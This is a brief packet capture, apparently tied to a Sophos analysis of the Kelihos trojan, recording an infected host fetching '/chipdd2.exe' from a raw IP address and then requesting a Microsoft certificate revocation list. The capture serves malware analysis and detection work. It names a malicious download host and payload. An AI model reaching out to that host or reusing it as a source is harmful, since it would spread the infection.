https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Kelihos-X/detailed-analysis.aspx

2016-10-23 01:25:27.341585 IP 192.168.1.102.58900 > 176.103.55.73.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /chipdd2.exe HTTP/1.1
E..Gio@……..f.g7I…PY..iH>..P….H..GET /chipdd2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 176.103.55.73
Connection: Keep-Alive
—
E..(f6@…>7…f..|….P….e3kbP….1……..
2016-10-23 01:25:33.418284 IP 192.168.1.102.58901 > 23.211.124.129.80: Flags [P.], seq 0:277, ack 1, win 256, length 277: HTTP: GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
E..=f7@…=!…f..|….P….e3kbP…….GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1
Cache-Control: max-age = 900
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Tue, 27 Sep 2016 05:00:38 GMT
If-None-Match: "773de167c18d21:0"
User-Agent: Microsoft-CryptoAPI/10.0
Host: crl.microsoft.com
—
E..(;<@…n?…f…*.”.P.94..=;.P………….
2016-10-23 01:25:44.058537 IP […]